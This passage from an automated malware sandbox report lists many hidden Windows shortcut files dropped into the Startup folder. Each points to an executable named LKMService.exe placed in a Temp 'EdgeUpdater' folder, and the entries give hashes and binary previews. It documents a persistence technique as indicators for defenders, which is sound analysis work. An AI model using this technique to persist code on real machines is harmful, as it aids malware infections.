MD5:	DCD97821F327E94958C80EACE17B6D60
SHA1:	715F6E83CC95D594D019ABA852E9EF0DF9BD4BD0
SHA-256:	160C701EC5E0D1B26AA35AF316C6B82CEBD6C1B53DC7EB2704B9E9954FD25C19
SHA-512:	BC0259BE86CC43CF3A3AAFA82CD67A3FFC09B8F10C34E71E1941931D91FED4580A7A3F06577322C5A0DC3390E1219F7A6F13F0BBD910AF0CA2DE1470D37C4FAA
Malicious:	false
Preview:	L..................F...."...o.k....JL.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g..............t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYV=..Temp..:......CW.^BYW=....l......................v@.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_17362a2652014a409b68fd9ebfa94d4c.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:20 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.956788172278339
Encrypted:	false
SSDEEP:	24:8P4A3pd+E0R1gKrRNglhW8Apfv/42eVvqyFm:8P4er0RVrRvggyF
MD5:	18F854F614ECDAE971D0DA1407692195
SHA1:	68809E8D47F35C47FF7566BDF2848E4A5D874ACB
SHA-256:	49784E8723CFDCBBB3EEC526632BD445003E116394156FDBD56DA59B5DDF5816
SHA-512:	FC191938E419429D10EFD0FC679D3EEB2003A1650A5383E75734303298C00A568337066CEC33F8973EEEDE748FBD31C445C308F8F6E50F48D5E1E720C79DF56E
Malicious:	false
Preview:	L..................F...."...o.k.....{.x.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY+=..Temp..:......CW.^BY+=....l.....................Y...T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1950dc17ab0f4160aae4b8a0fdba971c.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:44 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.953153037406712
Encrypted:	false
SSDEEP:	24:8PoA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8Poer0R5rRvggyF
MD5:	E249006B9D7E6D81A51500471CFD318A
SHA1:	0C8A5DC6595163E1EF7562C26F998B04E664F289
SHA-256:	4CB839B17933D3D35C2646C711E639DA94CEE0026024DACB8DEFD794E9E8F088
SHA-512:	B20D8B11DB81884957D56AE6E48C6B8D170D38B899F43D047F1F6FFFBA66E42FECCCE30E213FCD0B5DD9FA00E3D8F39F2F39F1FA910482B0D9C36E833F9E787B
Malicious:	false
Preview:	L..................F...."...o.k.............0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1a51d9bb4b8241a988369d5a6aa9acd6.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:10 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.952548409519113
Encrypted:	false
SSDEEP:	24:8P7A3pd+E0R+gKncNglhW8Apfv/42eVvqyFm:8P7er0RWSRvggyF
MD5:	EAA4F778A0F1A20EBD800175BB842556
SHA1:	91849D9A6EF44821BC84DB1FAFD443430A27428A
SHA-256:	5F3B38A52C65CAA2B29940D94726D01A365D94EC6E9138DA264A202325AE7056
SHA-512:	8868BC3FE69826FF50B7A045A7B8ADEAAE588B07A62E5427511033AA626052B69B05F85EC94743056E2A2F013FA1EF82A89118F72213D86207D52C02122FBFDC
Malicious:	false
Preview:	L..................F...."...o.k.......r.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY =..Temp..:......CW.^BY =....l.......................*.T.e.m.p.....`.1.....BY"=..EDGEUP~1..H......BY =BY"=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1acdb7c6cd464f8bbf053ba2e3c292f3.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:28 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.953458626345788
Encrypted:	false
SSDEEP:	24:8PSA3pd+E0RBgKiRNglhW8Apfv/42eVvqyFm:8PSer0R8rRvggyF
MD5:	59AC05830EACBD85E1932715ACF3E0AA
SHA1:	A52CE1D452A3106EB7D5A0D66024EEDE4FE360AA
SHA-256:	9B34BE0F83D3BCF2632CFA756E6E49F4DF659A1C7DFD3A40D0B44A00413D91C7
SHA-512:	CFCAB2B0015A93D024242D857CD07F60AE54B761A6E4FA17E074536B685332FF3D59A06B3ED5E734FF17B8CEC24B8C8572AD1C1643840CD02361002118245FE2
Malicious:	false
Preview:	L..................F...."...o.k.....C.}.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY/=..Temp..:......CW.^BY/=....l.......................".T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1adf85cecce34c2c92ee385b72109918.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:08 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.949861784638872
Encrypted:	false
SSDEEP:	24:8PFA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8PFer0R5rRvggyF
MD5:	570C84A3A4D1772E7B217F68F5FFE7BE
SHA1:	765AE94323EBAA461C54562AF457983E69F1A933
SHA-256:	538D04365EFC3992FB0C32D300AC1AAB755C7A0364674B880E29D92DE1AFF560
SHA-512:	83987CEB2D42A2D9D1002ED68953996BEA8203C2469008AE1843F6AC1B1BDC8B89E16B98FE596D6EA145724D2FBA989067344697EBA9A6D24E07AEA568D17FEF
Malicious:	false
Preview:	L..................F...."...o.k............0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1c02f26ac530417fb2fadd7af3fc4d65.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:35 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.963755787547487
Encrypted:	false
SSDEEP:	24:8PB5Opd+E0REgKPRNglhW8Apfv/42eVvqyFm:8P/Or0RorRvggyF
MD5:	A9271C379F91668D4F2FB85169B89B0D
SHA1:	24CB2E2B5FFBD963C3C7594D36EB1D50B9DF35F6
SHA-256:	8194213C121E71ED3419C606F24E342F7292875D0EC0FDD94037810CA02D4CAA
SHA-512:	B3559FEB68F0DD48F4388E66C0BB97E73C2D0F902BFB24E383F37B3AB42B5112F285B8BC549E9CA3E98D6307B1050C0C9E45874EBE516257FE30DA94A9F2D2FD
Malicious:	false
Preview:	L..................F...."...o.k.... .......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....../.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYR=..Temp..:......CW.^BYR=....l......................u_.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1f0fcf26999f4580aad4326e8ae3d1a3.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:03 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.946282396520571
Encrypted:	false
SSDEEP:	24:8PEA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8PEer0R5rRvggyF
MD5:	F399A5F17CEB646E289A104CE01F081A
SHA1:	3FECDE9838E4202DAA0135A3BD8FDE7F8E05A652
SHA-256:	796C376AAB00CB94222F89926F9F3EEEA742646D4766ABC5A75F1F133B839F89
SHA-512:	FD39248459B216CC073C551E19AAFC7B5198B74BD6356743F21F7509D45AB88141999332E583482EB7C18A52CAF178B24B27D2FFB517BE1D316AC629A46EE4CA
Malicious:	false
Preview:	L..................F...."...o.k.....6.......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_203bbb5236bb490094bbaf1e760cfdd2.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:43:05 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.953182517494338
Encrypted:	false
SSDEEP:	24:8PjvU34Cpd+E0RggKLOxRNglhW8Apfv/42eVvqyFm:8PjvUICr0ROOxrRvggyF
MD5:	3D1939951F9FD8C9A2D26B7957415006
SHA1:	84ECBE74A927A745D55527520FB0A717E15E7EED
SHA-256:	0904D4E32D72059AC9ECFEAF10D628FDA48293AE44730AB4E15B6B92BD1DEC26
SHA-512:	E9014B0972574579E8CFE39D08E18D6C64570C84BD39B50E7BE64C4C084F7A78201BDF2C0D1B84CF0F2435AC285D6EBB3DD3C1CFAFE26C0AC6308FD2E772D027
Malicious:	false
Preview:	L..................F...."...o.k....oqh......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....n.(.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYV=..Temp..:......CW.^BYW=....l......................v@.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_20598259efe14363887c9f5c20ad079e.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:53 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.947123293079517
Encrypted:	false
SSDEEP:	24:8Pa5A3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8PUer0R5rRvggyF
MD5:	B23944708710372B10FB125531950F91
SHA1:	A4656D022F07F5210D4A9BD950FEE33A8FF159FC
SHA-256:	1254FA87D0E65E83DE1B3B7048F20BE49E0BA8BB2FE770C73BDF8878A80AE063
SHA-512:	3929452DFAEEECF200C4C7CF19CED8D65559C20E053CF13FE345D4E3B5E71707E6B073A84F2DAB07BF676CA0987E4DD6D323F683CDCA48F01B34CADF9F9BA55D
Malicious:	false
Preview:	L..................F...."...o.k....3.......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2136223416954fe187033caebcb1cfc8.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:16 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.944287014261837
Encrypted:	false
SSDEEP:	24:8PIA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8PIer0R5rRvggyF
MD5:	5665EEEB1888B93B597991C1627E0B71
SHA1:	0AB71840BDA0F91E882537C6B63EFAF524155534
SHA-256:	DFA36BEFC8EEF68084ABEBC4E7A3819695B59F88C8F1B3AE85CD3F70FD0E22B3
SHA-512:	E191FAA00611EBD48CB527BA13ECFC3998D24E5C8BD21E05C067257D44A629DDD92A23460149D68D0653E3E4787190DC6534989CF99DDC1394F0C70B3AA8230D
Malicious:	false
Preview:	L..................F...."...o.k......U......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_21d4923aa73142a49be84ce8bde9060d.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:16 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.953987204836157
Encrypted:	false
SSDEEP:	24:8P1cA3pd+E0R+gKrRNglhW8Apfv/42eVvqyFm:8P1cer0RSrRvggyF
MD5:	7126A2FECACCB2E1D1191E13752C0FBD
SHA1:	28E6F6490AFAD57C5FB7776BCD5D7966379D910A
SHA-256:	824B2B28E8DEDC64D44473760D3AB64973057F5E18103997DDFBA021D70C543B
SHA-512:	FF4F797E0075BD6840AC5E04837366476CA01D9BAA34A9CAC3A7F6F2C9AFC520AC98DE65D23F06B3ED6BF44653C3742EC177DDB6CA6CABA95F72A357F5680290
Malicious:	false
Preview:	L..................F...."...o.k....2..v.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY =..Temp..:......CW.^BY =....l.......................*.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_22c85930711e41eb9e3a1d6112b89721.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:08 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.951023273057027
Encrypted:	false
SSDEEP:	24:8POA3pd+E0R+gKncNglhW8Apfv/42eVvqyFm:8POer0RWSRvggyF
MD5:	2669C175E2E916EE722930286854249A
SHA1:	0B0F1355F8520DC9DE63EFF35D71638BE1F14BB6
SHA-256:	9D3CA3E9C86ECD54234BD6A830ED67CB01EFAB15052F23108EF3573F72095264
SHA-512:	F93CCDC191E152516FA3463EDBDE597873F45C748218C546C5F8BC22CF0FF853625B930F9BA4A7CFE2FB63FD9FFB9EABB2EA005D526F31DDC6F77C76BEC87315
Malicious:	false
Preview:	L..................F...."...o.k....\|Y.q.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY =..Temp..:......CW.^BY =....l.......................*.T.e.m.p.....`.1.....BY"=..EDGEUP~1..H......BY =BY"=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2aa8fd5a8b00407abe6d375bb6c33eb7.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:48 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.948503438246942
Encrypted:	false
SSDEEP:	24:8PdA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8Pder0R5rRvggyF
MD5:	1A06EAA1C910F8C6D83BDBB0326AC118
SHA1:	4423E1638A9FFDCAA716A572B747D48FF22CCDC2
SHA-256:	3227817D83FFA72541727DFEDF21ABB51B324C601397F890B15BBBF6B094E903
SHA-512:	31C9F1305AF66EFE991D07D057DFA061AA9364C7B88C4FAE5800970D20DBB6B4A9770A3A934EB1965A3EB2D22D94B222DE16DDC8236DB634AA3CC320E45F1916
Malicious:	false
